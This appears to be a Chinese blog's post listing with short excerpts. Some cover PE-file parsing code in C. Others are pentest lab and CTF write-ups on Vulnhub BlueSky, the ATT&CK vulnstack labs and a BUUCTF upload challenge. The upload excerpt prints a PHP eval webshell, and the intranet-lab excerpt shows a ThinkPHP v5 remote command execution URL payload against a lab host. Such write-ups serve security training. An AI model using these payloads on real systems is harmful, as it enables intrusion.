- 博客(10)
- 收藏
- 关注
原创 PE导出表
#include <string.h>#include <stdio.h>#include <stdlib.h>#include <iostream>#include <windows.h>#pragma warning(disable:4996) #define openll "C:\\Users\\Administrator\\Desktop\\dialer.exe"LPVOID OpenFile(){ DWOR..
2022-04-02 15:23:07
159
原创 PE合并节
//合并节 PIMAGE_SECTION_HEADER andRE = pSection; andRE->SizeOfRawData = andRE->Misc.VirtualSize > andRE->SizeOfRawData ? andRE->Misc.VirtualSize : andRE->SizeOfRawData; andRE->SizeOfRawData = pOption->SizeOfImage - andRE-..
2022-03-30 09:30:57
272
原创 PE扩大节
注意:扩大节最好在最后节扩展 不然要修改好多东西一:扩大节1、拉伸到内存2、分配一块新的空间:SizeOfImage+Ex3、将最后一个节的SizeOfRawData 和 VirtualSize改成NSizeOfRawData = VirtualSize = NN = (SizeOfRawData或者Virtualsize 内存对齐后的值)+Ex4、修改sizeofimage大小Sizeofimage= sizeofimage+Ex下面是实现代码:...
2022-03-29 21:54:12
608
1
原创 PE头 解析程序 42作业
通过海哥的滴代码方式写的#include <stdio.h>#include <iostream>#include <Windows.h>#include <stdlib.h>#include <string>#pragma warning(disable : 4996)LPVOID ReadPEFile(){ LPVOID FILEbuffer(); int size = NULL; FILE* fp; fp = fo
2022-03-22 20:32:09
568
原创 Vulnhub--BlueSky:1
靶场下载地址https://download.vulnhub.com/bluesky/BlueSky.ova首先扫描一下外网存活ip 找到目标机器的ip扫描开放了扫描端口服务得知开了 22 ssh 与8080 目标上还运行了一个Apache TomcatTomcat是应用(java)服务器,它只是一个servlet容器,是Apache的扩展Struts2 漏洞介绍Struts2:是apache项目下的一个web 框架漏洞涉及Stru...
2021-12-30 22:29:33
765
原创 极客大挑战 2019 Upload :1文件上传
绕过后缀的有文件格式有php,php3,php4,php5,phtml.pht这里phtml可以成功这里发现过滤了?号 还有文件头 改jpeg\png\gif都可以 绕过问号<script language="pHp">@eval($_POST['cmd'])</script>这里上传的文件在upload目录下下面使用蚁剑连接剩下的flag 你们自己找找啦 <"...
2021-12-28 21:42:15
160
原创 内网三层靶机实战
第一步:扫描Target1第二步:既然存在http服务,那就用浏览器打开访问看看是个什么第三步:根据 ThinkPHPv5 然后进行百度 然后得知存在命令执行漏洞然后进行漏洞测试通过这句话进行远程命令执行上传webshell脚本:"http://192.168.1.11/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&var...
2021-12-26 22:21:48
2052
3
原创 ATT&CK实战系列(三)
靶机下载地址漏洞详情目标:域控中存在一份重要文件。本次环境为黑盒测试,不提供虚拟机账号密码环境配置攻击机kali: 192.168.1.109web-centos:192.168.1.110192.168.93.100Web1-ubantu:192.168.93.120pc:192.168.93.30Win2008:192.168.93.20Windows server 2012:192.168.93.10外...
2021-12-25 20:20:33
3043
原创 ATT&CK实战系列 (一)
靶场下载地址漏洞详情http://vulnstack.qiyuanxuetang.net/vuln/detail/2/攻击机:kali:172.26.16.122255.255.254.0win7双网卡 外网连接kali:172.26.16.123 255.255.254.0 内网网卡:192.168.52.143Win2003:内网ip 192.168.52.141 255.255.255.0Win2008:内网IP 19...
2021-12-24 14:53:25
2352
原创 ATT&CK实战系列(二)
vlunstack是红日安全团队出品的一个实战环境,具体介绍请访问:漏洞详情拓扑结构大体如下:环境搭建Kaliip:192.168.111.135WebIp1:192.168.111.80Ip2:10.10.10.80os:windows 2008应用:weblogic 10.3.6 mssql 2008PcIp1:192.168.111.201Ip2:10.10.10.201Os:windows7DCip:10.10.10.10.
2021-12-22 22:18:37
1531
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人